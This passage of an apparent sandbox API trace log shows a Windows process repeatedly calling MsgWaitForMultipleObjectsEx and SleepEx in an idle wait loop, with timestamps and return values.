pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.242] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.257] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.366] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.383] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.491] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.506] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.616] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.631] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.741] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.756] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.865] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.881] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.990] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.005] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.121] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.130] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.240] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.255] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.365] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.380] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.489] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.505] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.614] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.630] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.739] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.754] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.864] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0259.879] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.988] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.004] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.113] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.129] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.238] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.254] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.363] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.378] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.488] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.503] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.613] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.628] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.738] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.753] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.863] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0260.878] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.987] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.002] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.112] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.127] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.237] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.254] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.361] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.377] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.486] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.502] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.611] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.626] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.736] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.751] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0261.876] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.985] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.001] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.110] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.126] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.235] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.251] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.362] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.375] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.485] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.500] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.609] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.625] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.734] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.752] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.875] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.984] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0262.999] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.116] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.124] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.233] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.249] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.358] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.374] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.483] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.498] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.608] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.623] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.732] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.748] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.873] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.982] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0263.998] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.107] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.122] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.232] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.247] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.357] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.372] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.481] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.497] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.606] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.622] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.731] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.746] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.856] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.871] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.981] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0264.996] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.106] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.121] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.230] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.246] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.355] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.370] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.480] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.495] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.605] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.620] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.729] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.745] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.854] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.870] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.979] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0265.994] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.105] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.119] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.229] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.244] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.353] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.369] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.478] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.494] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.604] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.618] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.728] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.743] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.852] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.868] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.977] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0266.993] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.103] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.119] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.227] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.242] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.352] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.367] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.477] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.492] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.618] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.632] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.742] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.757] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.867] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0267.882] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.991] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.007] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.116] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.132] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.241] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.256] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.366] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.381] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.491] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.506] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.618] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.631] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.740] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.756] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.865] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0268.880] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.990] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.005] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.115] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.130] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.239] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.255] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.365] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.380] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.489] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.504] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.623] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.629] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.739] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.754] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.863] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0269.879] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.988] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.003] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.113] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.128] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.238] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.253] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.363] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.378] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.487] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.503] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.612] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.636] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.737] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.752] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.862] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0270.877] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.986] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.002] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.112] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.127] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.236] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.251] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.361] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.376] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.486] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.501] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.612] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.626] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.735] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.751] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0271.876] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.985] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.000] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.110] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.125] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.235] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.250] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.359] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.375] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.484] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.500] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.609] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.624] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.734] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.749] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.874] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0272.983] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0272.999] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.108] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.124] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.233] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.248] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.358] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.373] MsgWaitForMultipleObjectsEx 